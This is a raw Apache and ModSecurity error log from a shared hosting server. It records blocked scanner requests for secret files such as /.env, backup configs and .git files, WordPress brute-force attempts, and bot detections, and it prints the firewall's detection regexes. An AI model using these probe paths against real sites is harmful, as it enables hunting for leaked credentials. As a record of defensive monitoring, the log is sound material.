[Tue May 26 14:17:03.541611 2026] [security2:error] [pid 598542:tid 598679] [client 45.148.10.95:1708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVeB_4iWyZxnXeAW3JWuAAAAAc"]
[Tue May 26 14:17:03.574854 2026] [security2:error] [pid 598542:tid 598699] [client 173.239.240.46:46521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWpAAAABs"]
[Tue May 26 14:17:03.610620 2026] [security2:error] [pid 598542:tid 598739] [client 173.239.240.42:35685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWpQAAAEM"]
[Tue May 26 14:17:03.656779 2026] [security2:error] [pid 598542:tid 598688] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWmwAAABA"]
[Tue May 26 14:17:04.276327 2026] [security2:error] [pid 598542:tid 598714] [client 85.11.167.19:49258] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webmail.ndequipments.com"] [uri "/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JW7QAAACo"]
[Tue May 26 14:17:04.362695 2026] [autoindex:error] [pid 598542:tid 598717] [client 45.148.10.95:2194] AH01276: Cannot serve directory /home2/jhonwy9v/dimensioncorporativa.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:17:04.363892 2026] [security2:error] [pid 598542:tid 598741] [client 45.148.10.95:2144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVeCP4iWyZxnXeAW3JW9QAAAEU"]
[Tue May 26 14:17:04.464240 2026] [security2:error] [pid 598542:tid 598768] [client 45.148.10.95:2242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JW-QAAAGA"]
[Tue May 26 14:17:04.591177 2026] [security2:error] [pid 598542:tid 598746] [client 45.148.10.95:2324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXBwAAAEo"]
[Tue May 26 14:17:04.605617 2026] [security2:error] [pid 598542:tid 598719] [client 45.148.10.95:2326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXCQAAAC8"]
[Tue May 26 14:17:04.612530 2026] [security2:error] [pid 598542:tid 598747] [client 45.148.10.95:2242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXCgAAAEs"]
[Tue May 26 14:17:04.641301 2026] [security2:error] [pid 598542:tid 598780] [client 202.141.30.10:35521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeCP4iWyZxnXeAW3JXAQAAAGw"]
[Tue May 26 14:17:04.641425 2026] [security2:error] [pid 598542:tid 598780] [client 202.141.30.10:35521] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeCP4iWyZxnXeAW3JXAQAAAGw"]
[Tue May 26 14:17:04.690441 2026] [security2:error] [pid 598542:tid 598698] [client 45.148.10.95:2312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXDgAAABo"]
[Tue May 26 14:17:04.761667 2026] [security2:error] [pid 598542:tid 598763] [client 45.148.10.95:2242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEAAAAFs"]
[Tue May 26 14:17:04.771951 2026] [security2:error] [pid 598542:tid 598752] [client 45.148.10.95:2350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEQAAAFA"]
[Tue May 26 14:17:04.777479 2026] [security2:error] [pid 598542:tid 598685] [client 45.148.10.95:2376] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEgAAAA0"]
[Tue May 26 14:17:04.779459 2026] [security2:error] [pid 598542:tid 598687] [client 45.148.10.95:2412] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEwAAAA8"]
[Tue May 26 14:17:05.280114 2026] [security2:error] [pid 598542:tid 598721] [client 45.148.10.95:2564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVeCf4iWyZxnXeAW3JXOwAAADE"]
[Tue May 26 14:17:05.476754 2026] [security2:error] [pid 598542:tid 598777] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeCf4iWyZxnXeAW3JXLAAAAGk"]
[Tue May 26 14:17:07.790609 2026] [security2:error] [pid 598542:tid 598756] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeC_4iWyZxnXeAW3JXbgAAAFQ"]
[Tue May 26 14:17:09.077010 2026] [security2:error] [pid 598542:tid 598738] [client 8.219.79.215:55150] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVeDf4iWyZxnXeAW3JXnQAAAEI"]
[Tue May 26 14:17:09.083495 2026] [security2:error] [pid 598542:tid 598764] [client 8.219.79.215:39278] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahVeDf4iWyZxnXeAW3JXoAAAAFw"]
[Tue May 26 14:17:09.577754 2026] [security2:error] [pid 598542:tid 598784] [client 85.11.167.19:49268] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webmail.ndequipments.com"] [uri "/"] [unique_id "ahVeDf4iWyZxnXeAW3JXrgAAAHA"]
[Tue May 26 14:17:10.297712 2026] [security2:error] [pid 598542:tid 598781] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeDf4iWyZxnXeAW3JXvAAAAG0"]
[Tue May 26 14:17:11.988729 2026] [fcgid:warn] [pid 598542:tid 598702] (70014)End of file found: [client 199.45.154.138:44796] mod_fcgid: can't get data from http client
[Tue May 26 14:17:12.620842 2026] [security2:error] [pid 598542:tid 598694] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeEP4iWyZxnXeAW3JX9AAAABY"]
[Tue May 26 14:17:13.903208 2026] [security2:error] [pid 598542:tid 598633] [remote 74.7.241.58:42550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVeEf4iWyZxnXeAW3JYIAAAcFo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Editor/Full_Site
[Tue May 26 14:17:14.187800 2026] [security2:error] [pid 598542:tid 598680] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeEf4iWyZxnXeAW3JYHwAAAAg"]
[Tue May 26 14:17:15.573556 2026] [security2:error] [pid 598542:tid 598733] [client 202.141.30.10:35424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeE_4iWyZxnXeAW3JYYQAAAD0"]
[Tue May 26 14:17:15.574279 2026] [security2:error] [pid 598542:tid 598733] [client 202.141.30.10:35424] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeE_4iWyZxnXeAW3JYYQAAAD0"]
[Tue May 26 14:17:15.956573 2026] [security2:error] [pid 598542:tid 598618] [remote 64.188.91.103:53173] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "landsonlogistics.com"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahVeE_4iWyZxnXeAW3JYcwAAI0s"]
[Tue May 26 14:17:16.057920 2026] [security2:error] [pid 598542:tid 598740] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeE_4iWyZxnXeAW3JYZwAAAEQ"]
[Tue May 26 14:17:16.353490 2026] [security2:error] [pid 598542:tid 598781] [client 91.227.114.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVeFP4iWyZxnXeAW3JYfQAAAG0"]
[Tue May 26 14:17:16.428923 2026] [security2:error] [pid 598542:tid 598635] [remote 178.156.182.155:36598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVeFP4iWyZxnXeAW3JYgQAAV1w"]
[Tue May 26 14:17:17.010448 2026] [security2:error] [pid 598542:tid 598692] [client 91.227.114.29:3920] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVeFP4iWyZxnXeAW3JYkQAAFG0"]
[Tue May 26 14:17:17.065292 2026] [security2:error] [pid 598542:tid 598549] [remote 216.73.216.240:35767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVeFf4iWyZxnXeAW3JYoQAABQY"]
[Tue May 26 14:17:18.170588 2026] [security2:error] [pid 598542:tid 598727] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeFf4iWyZxnXeAW3JY6wAAADc"]
[Tue May 26 14:17:20.853846 2026] [security2:error] [pid 598542:tid 598696] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeGP4iWyZxnXeAW3JZOwAAABg"]
[Tue May 26 14:17:22.673145 2026] [security2:error] [pid 598542:tid 598627] [remote 123.30.233.13:45172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVeGv4iWyZxnXeAW3JZcQAAXVQ"]
[Tue May 26 14:17:23.083134 2026] [security2:error] [pid 598542:tid 598551] [remote 103.95.119.103:39536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVeGv4iWyZxnXeAW3JZdgAAKwg"]
[Tue May 26 14:17:23.474690 2026] [security2:error] [pid 598542:tid 598759] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeG_4iWyZxnXeAW3JZgAAAAFc"]
[Tue May 26 14:17:25.419391 2026] [security2:error] [pid 598542:tid 598698] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeHP4iWyZxnXeAW3JZtAAAABo"]
[Tue May 26 14:17:26.741403 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeHv4iWyZxnXeAW3JZ1wAAAGc"]
[Tue May 26 14:17:26.741555 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeHv4iWyZxnXeAW3JZ1wAAAGc"]
[Tue May 26 14:17:27.755630 2026] [security2:error] [pid 598542:tid 598692] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeH_4iWyZxnXeAW3JZ6AAAABQ"]
[Tue May 26 14:17:28.721793 2026] [security2:error] [pid 598542:tid 598689] [client 62.244.225.226:60134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVeIP4iWyZxnXeAW3JaDQAAABE"]
[Tue May 26 14:17:29.485995 2026] [security2:error] [pid 598542:tid 598734] [client 222.252.73.0:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeIf4iWyZxnXeAW3JaHQAAAD4"]
[Tue May 26 14:17:29.804006 2026] [security2:error] [pid 598542:tid 598693] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeIf4iWyZxnXeAW3JaKgAAABU"]
[Tue May 26 14:17:31.375260 2026] [security2:error] [pid 598542:tid 598785] [client 74.7.228.11:48772] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "amslca.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVeI_4iWyZxnXeAW3JangAAcRA"]
[Tue May 26 14:17:31.443460 2026] [security2:error] [pid 598542:tid 598795] [client 74.7.241.167:55166] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "amslca.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVeI_4iWyZxnXeAW3JaoAAAezo"]
[Tue May 26 14:17:31.896354 2026] [security2:error] [pid 598542:tid 598786] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeI_4iWyZxnXeAW3JapAAAAHI"]
[Tue May 26 14:17:31.944382 2026] [security2:error] [pid 598542:tid 598771] [client 4.201.75.230:28227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.d2cargo.com"] [uri "/wk/index.php"] [unique_id "ahVeI_4iWyZxnXeAW3JasAAAAGM"]
[Tue May 26 14:17:32.341069 2026] [security2:error] [pid 598542:tid 598680] [client 89.124.112.117:63178] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.124.112.117" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVeJP4iWyZxnXeAW3JatAAAAAg"], referer: https://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 14:17:32.341209 2026] [security2:error] [pid 598542:tid 598680] [client 89.124.112.117:63178] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVeJP4iWyZxnXeAW3JatAAAAAg"], referer: https://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 14:17:33.620261 2026] [security2:error] [pid 598542:tid 598604] [remote 167.71.130.119:52422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVeJf4iWyZxnXeAW3Ja1gAAfT0"]
[Tue May 26 14:17:34.239163 2026] [security2:error] [pid 598542:tid 598789] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeJf4iWyZxnXeAW3Ja5QAAAHU"]
[Tue May 26 14:17:37.333564 2026] [security2:error] [pid 598542:tid 598682] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeKP4iWyZxnXeAW3JbMAAAAAo"]
